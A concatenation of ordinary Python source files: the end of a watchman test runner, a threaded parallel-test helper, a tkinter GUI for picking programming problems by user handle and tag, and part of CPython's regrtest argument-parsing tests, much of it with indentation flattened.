level = min(4, math.ceil(1.5 * multiprocessing.cpu_count()))
if "CIRCLECI" in os.environ:
# Use fewer cores in circle CI because the inotify sysctls
# are pretty low, and we sometimes hit those limits.
level = level / 2
return int(level)
return 1
parser.add_argument(
"--concurrency",
default=default_concurrency(),
type=int,
help="How many tests to run at once",
)
parser.add_argument(
"--watcher",
action="store",
default="auto",
help="Specify which watcher should be used to run the tests",
)
parser.add_argument(
"--debug-watchman",
action="store_true",
help="Pauses start up and prints out the PID for watchman server process."
+ "Forces concurrency to 1.",
)
parser.add_argument(
"--watchman-path", action="store", help="Specify the path to the watchman binary"
)
parser.add_argument(
"--win7", action="store_true", help="Set env to force win7 compatibility tests"
)
parser.add_argument(
"--retry-flaky",
action="store",
type=int,
default=2,
help="How many additional times to retry flaky tests.",
)
parser.add_argument(
"--testpilot-json",
action="store_true",
help="Output test results in Test Pilot JSON format",
)
parser.add_argument(
"--pybuild-dir",
action="store",
help="For out-of-src-tree builds, where the generated python lives",
)
args = parser.parse_args()
if args.pybuild_dir is not None:
sys.path.insert(0, os.path.realpath(args.pybuild_dir))
# Import our local stuff after we've had a chance to look at args.pybuild_dir.
# The `try` block prevents the imports from being reordered
try:
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
except ImportError:
raise
# We test for this in a test case
os.environ["WATCHMAN_EMPTY_ENV_VAR"] = ""
os.environ["HGUSER"] = "John Smith <smith@example.com>"
os.environ["NOSCMLOG"] = "1"
os.environ["WATCHMAN_NO_SPAWN"] = "1"
if args.win7:
os.environ["WATCHMAN_WIN7_COMPAT"] = "1"
# Ensure that we find the watchman we built in the tests
if args.watchman_path:
args.watchman_path = os.path.realpath(args.watchman_path)
bin_dir = os.path.dirname(args.watchman_path)
os.environ["WATCHMAN_BINARY"] = args.watchman_path
else:
bin_dir = os.path.dirname(__file__)
os.environ["PYWATCHMAN_PATH"] = os.path.join(os.getcwd(), "python")
os.environ["WATCHMAN_PYTHON_BIN"] = os.path.abspath(
os.path.join(os.getcwd(), "python", "bin")
)
os.environ["PATH"] = "%s%s%s" % (
os.path.abspath(bin_dir),
os.pathsep,
os.environ["PATH"],
)
# We'll put all our temporary stuff under one dir so that we
# can clean it all up at the end
temp_dir = TempDir.get_temp_dir(args.keep)
def interrupt_handler(signo, frame):
Interrupt.setInterrupted()
signal.signal(signal.SIGINT, interrupt_handler)
class Result(unittest.TestResult):
# Make it easier to spot success/failure by coloring the status
# green for pass, red for fail and yellow for skip.
# also print the elapsed time per test
transport = None
encoding = None
attempt = 0
def shouldStop(self):
if Interrupt.wasInterrupted():
return True
return super(Result, self).shouldStop()
def startTest(self, test):
self.startTime = time.time()
super(Result, self).startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self.startTime
super(Result, self).addSuccess(test)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "passed",
"test": test.id(),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[32mPASS\033[0m %s (%.3fs)%s"
% (test.id(), elapsed, self._attempts())
)
def addSkip(self, test, reason):
elapsed = time.time() - self.startTime
super(Result, self).addSkip(test, reason)
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "skipped",
"test": test.id(),
"details": reason,
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print("\033[33mSKIP\033[0m %s (%.3fs) %s" % (test.id(), elapsed, reason))
def __printFail(self, test, err):
elapsed = time.time() - self.startTime
t, val, trace = err
if args.testpilot_json:
print(
json.dumps(
{
"op": "test_done",
"status": "failed",
"test": test.id(),
"details": "".join(traceback.format_exception(t, val, trace)),
"start_time": self.startTime,
"end_time": time.time(),
}
)
)
else:
print(
"\033[31mFAIL\033[0m %s (%.3fs)%s\n%s"
% (
test.id(),
elapsed,
self._attempts(),
"".join(traceback.format_exception(t, val, trace)),
)
)
def addFailure(self, test, err):
self.__printFail(test, err)
super(Result, self).addFailure(test, err)
def addError(self, test, err):
self.__printFail(test, err)
super(Result, self).addError(test, err)
def setAttemptNumber(self, attempt):
self.attempt = attempt
def _attempts(self):
if self.attempt > 0:
return " (%d attempts)" % self.attempt
return ""
def expandFilesList(files):
    """expand any dir names into a full list of files"""
    res = []
    for g in files:
        if os.path.isdir(g):
            for dirname, _dirs, filenames in os.walk(g):
                for f in filenames:
                    if not f.startswith("."):
                        res.append(os.path.normpath(os.path.join(dirname, f)))
        else:
            res.append(os.path.normpath(g))
    return res
if args.files:
args.files = expandFilesList(args.files)
def shouldIncludeTestFile(filename):
"""used by our loader to respect the set of tests to run"""
global args
fname = os.path.relpath(filename.replace(".pyc", ".py"))
if args.files:
for f in args.files:
if f == fname:
return True
return False
if args.method:
# implies python tests only
if not fname.endswith(".py"):
return False
return True
def shouldIncludeTestName(name):
"""used by our loader to respect the set of tests to run"""
global args
if args.method:
for f in args.method:
if f in name:
# the strict original interpretation of this flag
# was pretty difficult to use in practice, so we
# now also allow substring matches against the
# entire test name.
return True
return False
return True
class Loader(unittest.TestLoader):
"""allows us to control the subset of which tests are run"""
def __init__(self):
super(Loader, self).__init__()
def loadTestsFromTestCase(self, testCaseClass):
return super(Loader, self).loadTestsFromTestCase(testCaseClass)
def getTestCaseNames(self, testCaseClass):
names = super(Loader, self).getTestCaseNames(testCaseClass)
return filter(lambda name: shouldIncludeTestName(name), names)
def loadTestsFromModule(self, module, *args, **kw):
if not shouldIncludeTestFile(module.__file__):
return unittest.TestSuite()
return super(Loader, self).loadTestsFromModule(module, *args, **kw)
loader = Loader()
suite = unittest.TestSuite()
directories = ["python/tests", "integration"]
facebook_directory = "integration/facebook"
if os.path.exists(facebook_directory):
# the facebook dir isn't sync'd to github, but it
# is present internally, so it should remain in this list
directories += [facebook_directory]
if has_asyncio:
directories += ["tests/async"]
for d in directories:
suite.addTests(loader.discover(d, top_level_dir=d))
if os.name == "nt":
t_globs = "tests/*.exe"
else:
t_globs = "tests/*.t"
tls = threading.local()
# Manage printing from concurrent threads
# http://stackoverflow.com/a/3030755/149111
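# ThreadSafeFile holds its lock across successive write() calls from the same
# thread and only releases it once a bare newline is written, so whole lines
# from concurrent runner threads don't interleave on stdout.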
class ThreadSafeFile(object):
def __init__(self, f):
self.f = f
self.lock = threading.RLock()
self.nesting = 0
def _getlock(self):
self.lock.acquire()
self.nesting += 1
def _droplock(self):
nesting = self.nesting
self.nesting = 0
for _ in range(nesting):
self.lock.release()
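    # 'softspace' is print-statement bookkeeping from Python 2; route it through
    # thread-local storage so concurrent writers don't clobber each other's state.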
def __getattr__(self, name):
if name == "softspace":
return tls.softspace
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == "softspace":
tls.softspace = value
else:
return object.__setattr__(self, name, value)
def write(self, data):
self._getlock()
self.f.write(data)
if data == "\n":
self._droplock()
def flush(self):
self._getlock()
self.f.flush()
self._droplock()
sys.stdout = ThreadSafeFile(sys.stdout)
tests_queue = queue.Queue()
results_queue = queue.Queue()
def runner():
global results_queue
global tests_queue
broken = False
try:
# Start up a shared watchman instance for the tests.
inst = WatchmanInstance.Instance(
{"watcher": args.watcher}, debug_watchman=args.debug_watchman
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
if has_asyncio:
# Each thread will have its own event loop
asyncio.set_event_loop(asyncio.new_event_loop())
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
while not broken:
test = tests_queue.get()
try:
if test == "terminate":
break
if Interrupt.wasInterrupted() or broken:
continue
result = None
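            # Run the test up to 1 + --retry-flaky times; before each attempt,
            # verify the shared watchman instance is still responsive and
            # restart it if the liveness check fails.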
for attempt in range(0, args.retry_flaky + 1):
# Check liveness of the server
try:
client = pywatchman.client(timeout=3.0, sockpath=inst.getSockPath())
client.query("version")
client.close()
except Exception as exc:
print(
"Failed to connect to watchman server: %s; starting a new one"
% exc
)
try:
inst.stop()
except Exception:
pass
try:
inst = WatchmanInstance.Instance(
{"watcher": args.watcher},
debug_watchman=args.debug_watchman,
)
inst.start()
# Allow tests to locate this default instance
WatchmanInstance.setSharedInstance(inst)
except Exception as e:
print("while starting watchman: %s" % str(e))
traceback.print_exc()
broken = True
continue
try:
result = Result()
result.setAttemptNumber(attempt)
if hasattr(test, "setAttemptNumber"):
test.setAttemptNumber(attempt)
test.run(result)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
break
except Exception as e:
print(e)
if hasattr(test, "setAttemptNumber") and not result.wasSuccessful():
# Facilitate retrying this possibly flaky test
continue
if (
not result.wasSuccessful()
and "TRAVIS" in os.environ
and hasattr(test, "dumpLogs")
):
test.dumpLogs()
results_queue.put(result)
finally:
tests_queue.task_done()
if not broken:
inst.stop()
def expand_suite(suite, target=None):
"""recursively expand a TestSuite into a list of TestCase"""
if target is None:
target = []
for test in suite:
if isinstance(test, unittest.TestSuite):
expand_suite(test, target)
else:
target.append(test)
# randomize both because we don't want tests to have relatively
# dependency ordering and also because this can help avoid clumping
# longer running tests together
random.shuffle(target)
return target
def queue_jobs(tests):
for test in tests:
tests_queue.put(test)
all_tests = expand_suite(suite)
if args.debug_watchman:
args.concurrency = 1
elif len(all_tests) < args.concurrency:
args.concurrency = len(all_tests)
queue_jobs(all_tests)
if args.concurrency > 1:
for _ in range(args.concurrency):
t = threading.Thread(target=runner)
t.daemon = True
t.start()
# also send a termination sentinel
tests_queue.put("terminate")
# Wait for all tests to have been dispatched
tests_queue.join()
else:
# add a termination sentinel
tests_queue.put("terminate")
runner()
# Now pull out and aggregate the results
tests_run = 0
tests_failed = 0
tests_skipped = 0
while not results_queue.empty():
res = results_queue.get()
tests_run = tests_run + res.testsRun
tests_failed = tests_failed + len(res.errors) + len(res.failures)
tests_skipped = tests_skipped + len(res.skipped)
if not args.testpilot_json:
print(
"Ran %d, failed %d, skipped %d, concurrency %d"
% (tests_run, tests_failed, tests_skipped, args.concurrency)
)
if "APPVEYOR" in os.environ:
logdir = "logs7" if args.win7 else "logs"
logzip = "%s.zip" % logdir
shutil.copytree(tempfile.tempdir, logdir)
subprocess.call(["7z", "a", logzip, logdir])
subprocess.call(["appveyor", "PushArtifact", logzip])
if "CIRCLE_ARTIFACTS" in os.environ:
print("Creating %s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"])
subprocess.call(
[
"zip",
"-q",
"-r",
"%s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"],
temp_dir.get_dir(),
]
)
if tests_failed or (tests_run == 0):
if args.keep_if_fail:
temp_dir.set_keep(True)
if args.testpilot_json:
# When outputting JSON, our return code indicates if we successfully
# produced output or not, not whether the tests passed. The JSON
# output contains the detailed test pass/failure information.
sys.exit(0)
sys.exit(1)
|
parallel.py
|
import contextlib
import itertools
import sys
import threading
import traceback
from typing import Any, Callable, Dict, Iterator, List, Tuple, TypeVar
import pytest
from determined import core
T = TypeVar("T")
class Execution:
"""
parallel.Execution is a tool for writing easy threading-based parallel tests.
Execution.run is the main helper function, but there are a few magic getters that return
correct thread-specific values when called from within an Execution.run-wrapped function.
Example usage:
SIZE = 10
with parallel.Execution(SIZE) as pex:
@pex.run
def all_ranks():
return pex.rank
assert all_ranks == list(range(SIZE))
"""
def __init__(
self, size: int, local_size: int = 1, make_distributed_context: bool = True
) -> None:
assert size % local_size == 0, f"size%local_size must be 0 ({size}%{local_size})"
self.size = size
self.local_size = local_size
self.cross_size = size // local_size
# We keep some thread-specific info to implement the magic getters.
self._info: Dict[int, Tuple[int, int, int]] = {}
self._dist = None
if make_distributed_context:
def _make_distributed_context() -> core.DistributedContext:
return core.DistributedContext(
rank=self.rank,
size=self.size,
local_rank=self.local_rank,
local_size=self.local_size,
cross_rank=self.cross_rank,
cross_size=self.cross_size,
chief_ip="localhost",
)
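            # Build one DistributedContext per rank by running the factory on
            # every rank's thread, so pex.distributed can return the right one.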
self._dist = self.run(_make_distributed_context)
def __enter__(self) -> "Execution":
return self
def __exit__(self, *arg: Any) -> None:
if not self._dist:
return
for dist in self._dist:
dist.close()
def run(self, fn: Callable[[], T]) -> List[T]:
"""
Run the same function on one-thread-per-rank, assert there were no exceptions, and return
the results from each rank.
run can be used as a decorator or called directly.
"""
results = [None] * self.size # type: List
errors = [None] * self.size # type: List
threads = []
for cross_rank, local_rank in itertools.product(
range(self.cross_size), range(self.local_size)
):
rank = cross_rank * self.local_size + local_rank
def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
thread_id = threading.get_ident()
self._info[thread_id] = (rank, cross_rank, local_rank)
try:
results[rank] = fn()
# Catch anything, including a pytest.Fail (so we can preserve it).
except BaseException as e:
# Print the error to stderr immediately, in case it results in a hang.
traceback.print_exc()
errors[rank] = (rank, e, sys.exc_info())
finally:
del self._info[thread_id]
threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Filter empty errors.
errors = [e for e in errors if e is not None]
if len(errors) > 1:
# In multi-errors situations, print all of them
for rank, _, exc_info in errors:
print(f"\nERROR ON RANK={rank}:", file=sys.stderr)
traceback.print_exception(*exc_info)
print(file=sys.stderr)
if errors:
# Reraise just the first exception.
_, e, _ = errors[0]
raise e
return results
@property
def rank(self) -> int:
"""
Only callable within an @Execution.run-wrapped function.
Use the thread identifier to figure out what the rank is for the caller, and return the
rank of that caller.
This is syntactic sugar to avoid having to write a large number of functions that take
parameters of (rank, cross_rank, local_rank).
"""
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][0]
@property
def cross_rank(self) -> int:
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][1]
@property
def local_rank(self) -> int:
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._info[thread_id][2]
@property
def distributed(self) -> core.DistributedContext:
assert self._dist is not None, "Execute was configured make_distributed_context=False"
thread_id = threading.get_ident()
assert thread_id in self._info, "must be called from within an @Execute-decorated function"
return self._dist[self.rank]
@contextlib.contextmanager
def raises_when(pred: bool, *args: Any, **kwargs: Any) -> Iterator[None]:
"""
A wrapper around pytest.raises that has a handy predicate argument.
Useful in @parallel.Execution.run-wrapped functions.
Example usage:
with parallel.Execution(2) as pex:
@pex.run
def all_workers_fn():
with raises_when(pex.rank!=0, AssertionError):
assert pex.rank == 0
"""
if not pred:
yield
return
with pytest.raises(*args, **kwargs):
yield
|
gui.py
|
import tkinter as tk
from tkinter import Entry
from inter import *
import threading
class gui:
def __init__(self):
self.root = tk.Tk()
self.root.title('Problem Picker')
self.inter = inter(self)
        self.buttons = {}
        self.labels = {}
        self.tags = set()
        self.tagoption = tk.IntVar()
        self.filteroption = tk.IntVar()
        self.row = 1
self.handles = set()
self.handle = tk.StringVar()
self.root.geometry('600x500')
        self.root.configure(bg='white')
self.handleLabel = tk.Label(self.root,text = 'Enter handle',font ='console 10 bold')
self.handleLabel.grid(row = 1, column = 1,columnspan = 2)
self.handleEntryfunc()
self.addHandleButtonfun()
        self.problemsbutton = tk.Button(self.root,text = "choose problems",font ='console 10 bold',command = self.chooseproblems)
self.problemsbutton.grid(row = 2,column = 2,padx=10,pady=5)
tk.Button(self.root,text='Load last handles',command=self.loadlasthandles).grid(row=3,column=2,pady=5,padx=10)
tk.Button(self.root,text='update the base',command=self.updatebase).grid(row=4,column=2,pady=5,padx=10)
self.lastbasetime = tk.Label(self.root,text = f'last update on : {self.inter.basetime}')
self.lastbasetime.grid(row=5,column=2,pady=5,padx=10)
self.root.mainloop()
def handleEntryfunc(self):
self.handleEntry = tk.Entry(self.root,textvariable = self.handle)
self.handleEntry.delete(0,100)
self.handleEntry.grid(row = 1,column = 5 , columnspan = 5,padx = 10)
self.handleEntry.config(width = 20)
def addHandleButtonfun(self):
self.addHandleButton = tk.Button(self.root,text = 'Add Handle',font = 'console 10 bold',command = self.addhandlefun)
button = self.addHandleButton
button.grid(row=1,column = 10,padx = 10)
def addhandlefun(self):
handle = self.handle.get()
self.handle.set('')
        if handle not in self.handles:
self.handles.add(handle)
self.row+=1
row = self.row
label = tk.Label(self.root,text = handle,font = 'console 10 bold')
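            # Bind the current row through a default argument so each remove
            # button acts on its own row rather than the last value of `row`.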
button = tk.Button(self.root,text = 'remove',command = lambda row=row:self.remove(row))
label.grid(column=10,row = row,padx =10,pady = 5)
button.grid(column=13,row=row,padx = 10)
self.buttons[row] = button
self.labels[row] = label
# self.lables[]
print(self.buttons)
def remove(self,row):
labelref = self.labels[row]
butref = self.buttons[row]
butref.config(bg = 'red',text = 'removed',command = lambda row=row:self.reinsert(row) )
self.handles.remove(labelref.cget('text'))
print(self.handles)
def reinsert(self,row):
labelref = self.labels[row]
butref = self.buttons[row]
butref.config(bg = 'white',text = 'remove',command = lambda row=row:self.remove(row) )
self.handles.add(labelref.cget('text'))
print(self.handles)
def loadlasthandles(self):
handles = self.inter.loadlast(self.inter.handlesfile)
for handle in handles:
self.handle.set(handle)
self.addhandlefun()
def updatebase(self):
self.inter.updatebase()
self.lastbasetime.config(text=f'last update on : {self.inter.basetime}')
def chooseproblems(self):
print(self.handles)
self.inter.picklelast(self.inter.handlesfile,self.handles)
self.inter.connectthreading(self.handles)
self.pr = tk.Tk()
self.pr.title('Problem Picker')
self.pr.geometry('600x500')
self.rendertags()
self.rendertagsoptions()
self.renderfilteroptions()
self.rendersubmit()
# self.renderloadlasttags()
self.pr.mainloop()
def rendertags(self):
row = 0
col =0
tags = list(self.inter.gettags())
self.tagboxes = {}
tags.sort()
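        # Lay the checkboxes out in two columns: row//2 selects the grid row
        # and col%2 alternates between the two columns.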
for tag in tags :
check = tk.Checkbutton(self.pr,text = tag)
check.grid(row = row//2,column = col%2)
check.config(justify='left',width = 10,anchor = "w",command = lambda tag=tag:self.updatetags(tag))
row+=1
col+=1
self.tagboxes[tag] = check
    def rendertagsoptions(self):  # For some reason this method wasn't working the way it's supposed to, so I made a hack around it.
tk.Label(self.pr,text='Problems must contain',font = 'console 10 bold').grid(row = 0,column=10,columnspan=4)
tk.Radiobutton(self.pr,text='only These tags',value=1,variable = self.tagoption,anchor = 'w',command = lambda :self.hacktag(1)).grid(row=1,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='some of These tags',value=2,variable = self.tagoption,anchor = 'w',command= lambda :self.hacktag(2)).grid(row=2,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='All of These tags',value=3,variable = self.tagoption,anchor = 'w',command = lambda :self.hacktag(3)).grid(row=3,column =10,padx = 10)
def renderfilteroptions(self):
tk.Label(self.pr,text='Filter by',font = 'console 10 bold').grid(row = 5,column=10,columnspan=4)
tk.Radiobutton(self.pr,text='not Submitted by the contestants',variable = self.filteroption,value=1,anchor = 'w',command = lambda :self.hackfilter(1)).grid(row=6,column = 10,padx = 10)
tk.Radiobutton(self.pr,text='not Accepted by the contestants',variable = self.filteroption,value=2,anchor = 'w',command = lambda :self.hackfilter(2)).grid(row=7,column = 10,padx = 10)
def rendersubmit(self):
but = tk.Button(self.pr,text = 'Submit',font = 'console 10 bold')
but.config(command = self.submit,width = 7)
but.grid(row = 9,column=10,padx = 3)
self.submitButton = but
self.submitsate()
    def submitsate(self):
        def statethread():
            # Disable the submit button while the worker thread started in
            # chooseproblems() is running, then re-enable it once it finishes.
            self.submitButton.config(state="disabled")
            self.inter.thread.join()
            self.submitButton.config(state="normal")
        threading.Thread(target = statethread).start()
def hacktag(self,num):
self.tagoption.set(num)
def hackfilter(self,num):
self.filteroption.set(num)
def renderloadlasttags(self):
but = tk.Button(self.pr,text = 'load last tags',command = self.loadlasttags)
but.grid(row = 11,column = 4)
def loadlasttags(self):
self.tags = self.inter.loadlast(self.inter.tagsfile)
for tag in self.tagboxes:
if tag in self.tags:
self.tagboxes[tag].invoke()
def updatetags(self,tag):
if tag in self.tags:
self.tags.remove(tag)
else:
self.tags.add(tag)
def submit(self):
# self.inter.org=False
print(self.tags)
self.inter.picklelast(self.inter.tagsfile,self.tags)
self.inter.submit()
        tk.Label(self.pr,text='problems written to problems.txt',font ='console 10 bold').grid(row = 10,column = 10,padx=10,pady=10)
gui()
|
test_regrtest.py
|
"""
Tests of regrtest.py.
Note: test_regrtest cannot be run twice in parallel.
"""
import contextlib
import glob
import io
import os.path
import platform
import re
import subprocess
import sys
import sysconfig
import tempfile
import textwrap
import time
import unittest
from test import libregrtest
from test import support
from test.support import os_helper
from test.libregrtest import utils, setup
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..')
ROOT_DIR = os.path.abspath(os.path.normpath(ROOT_DIR))
LOG_PREFIX = r'[0-9]+:[0-9]+:[0-9]+ (?:load avg: [0-9]+\.[0-9]{2} )?'
TEST_INTERRUPTED = textwrap.dedent("""
from signal import SIGINT, raise_signal
try:
raise_signal(SIGINT)
except ImportError:
import os
os.kill(os.getpid(), SIGINT)
""")
class ParseArgsTestCase(unittest.TestCase):
"""
Test regrtest's argument parsing, function _parse_args().
"""
def checkError(self, args, msg):
with support.captured_stderr() as err, self.assertRaises(SystemExit):
libregrtest._parse_args(args)
self.assertIn(msg, err.getvalue())
def test_help(self):
for opt in '-h', '--help':
with self.subTest(opt=opt):
with support.captured_stdout() as out, \
self.assertRaises(SystemExit):
libregrtest._parse_args([opt])
self.assertIn('Run Python regression tests.', out.getvalue())
def test_timeout(self):
ns = libregrtest._parse_args(['--timeout', '4.2'])
self.assertEqual(ns.timeout, 4.2)
self.checkError(['--timeout'], 'expected one argument')
self.checkError(['--timeout', 'foo'], 'invalid float value')
def test_wait(self):
ns = libregrtest._parse_args(['--wait'])
self.assertTrue(ns.wait)
def test_worker_args(self):
ns = libregrtest._parse_args(['--worker-args', '[[], {}]'])
self.assertEqual(ns.worker_args, '[[], {}]')
self.checkError(['--worker-args'], 'expected one argument')
def test_start(self):
for opt in '-S', '--start':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.start, 'foo')
self.checkError([opt], 'expected one argument')
def test_verbose(self):
ns = libregrtest._parse_args(['-v'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['-vvv'])
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args(['--verbose'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['--verbose'] * 3)
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args([])
self.assertEqual(ns.verbose, 0)
def test_verbose2(self):
for opt in '-w', '--verbose2':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose2)
def test_verbose3(self):
for opt in '-W', '--verbose3':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose3)
def test_quiet(self):
for opt in '-q', '--quiet':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_slowest(self):
for opt in '-o', '--slowest':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.print_slow)
def test_header(self):
ns = libregrtest._parse_args(['--header'])
self.assertTrue(ns.header)
ns = libregrtest._parse_args(['--verbose'])
self.assertTrue(ns.header)
def test_randomize(self):
for opt in '-r', '--randomize':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.randomize)
def test_randseed(self):
ns = libregrtest._parse_args(['--randseed', '12345'])
self.assertEqual(ns.random_seed, 12345)
self.assertTrue(ns.randomize)
self.checkError(['--randseed'], 'expected one argument')
self.checkError(['--randseed', 'foo'], 'invalid int value')
def test_fromfile(self):
for opt in '-f', '--fromfile':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.fromfile, 'foo')
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo', '-s'], "don't go together")
def test_exclude(self):
for opt in '-x', '--exclude':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.exclude)
def test_single(self):
for opt in '-s', '--single':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.single)
self.checkError([opt, '-f', 'foo'], "don't go together")
def test_ignore(self):
for opt in '-i', '--ignore':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.ignore_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--ignorefile', filename])
self.assertEqual(ns.ignore_tests,
['matchfile1', 'matchfile2'])
def test_match(self):
for opt in '-m', '--match':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.match_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
ns = libregrtest._parse_args(['-m', 'pattern1',
'-m', 'pattern2'])
self.assertEqual(ns.match_tests, ['pattern1', 'pattern2'])
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--matchfile', filename])
self.assertEqual(ns.match_tests,
['match', 'matchfile1', 'matchfile2'])
def test_failfast(self):
for opt in '-G', '--failfast':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '-v'])
self.assertTrue(ns.failfast)
ns = libregrtest._parse_args([opt, '-W'])
self.assertTrue(ns.failfast)
self.checkError([opt], '-G/--failfast needs either -v or -W')
def test_use(self):
for opt in '-u', '--use':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'gui,network'])
self.assertEqual(ns.use_resources, ['gui', 'network'])
ns = libregrtest._parse_args([opt, 'gui,none,network'])
self.assertEqual(ns.use_resources, ['network'])
expected = list(libregrtest.ALL_RESOURCES)
expected.remove('gui')
ns = libregrtest._parse_args([opt, 'all,-gui'])
self.assertEqual(ns.use_resources, expected)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid resource')
# all + a resource not part of "all"
ns = libregrtest._parse_args([opt, 'all,tzdata'])
self.assertEqual(ns.use_resources,
list(libregrtest.ALL_RESOURCES) + ['tzdata'])
# test another resource which is not part of "all"
ns = libregrtest._parse_args([opt, 'extralargefile'])
self.assertEqual(ns.use_resources, ['extralargefile'])
def test_memlimit(self):
for opt in '-M', '--memlimit':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '4G'])
self.assertEqual(ns.memlimit, '4G')
self.checkError([opt], 'expected one argument')
def test_testdir(self):
ns = libregrtest._parse_args(['--testdir', 'foo'])
self.assertEqual(ns.testdir, os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError(['--testdir'], 'expected one argument')
def test_runleaks(self):
for opt in '-L', '--runleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.runleaks)
def test_huntrleaks(self):
for opt in '-R', '--huntrleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, ':'])
self.assertEqual(ns.huntrleaks, (5, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:'])
self.assertEqual(ns.huntrleaks, (6, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, ':3'])
self.assertEqual(ns.huntrleaks, (5, 3, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:3:leaks.log'])
self.assertEqual(ns.huntrleaks, (6, 3, 'leaks.log'))
self.checkError([opt], 'expected one argument')
self.checkError([opt, '6'],
'needs 2 or 3 colon-separated arguments')
self.checkError([opt, 'foo:'], 'invalid huntrleaks value')
self.checkError([opt, '6:foo'], 'invalid huntrleaks value')
def test_multiprocess(self):
for opt in '-j', '--multiprocess':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '2'])
self.assertEqual(ns.use_mp, 2)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
self.checkError([opt, '2', '-T'], "don't go together")
self.checkError([opt, '0', '-T'], "don't go together")
def test_coverage(self):
for opt in '-T', '--coverage':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.trace)
def test_coverdir(self):
for opt in '-D', '--coverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.coverdir,
os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError([opt], 'expected one argument')
def test_nocoverdir(self):
for opt in '-N', '--nocoverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertIsNone(ns.coverdir)
def test_threshold(self):
for opt in '-t', '--threshold':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '1000'])
self.assertEqual(ns.threshold, 1000)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
def test_nowindows(self):
for opt in '-n', '--nowindows':
with self.subTest(opt=opt):
with contextlib.redirect_stderr(io.StringIO()) as stderr:
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.nowindows)
err = stderr.getvalue()
self.assertIn('the --nowindows (-n) option is deprecated', err)
def test_forever(self):
for opt in '-F', '--forever':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.forever)
def test_unrecognized_argument(self):
self.checkError(['--xxx'], 'usage:')
def test_long_option__partial(self):
ns = libregrtest._parse_args(['--qui'])
self.assertTrue(ns.quiet)
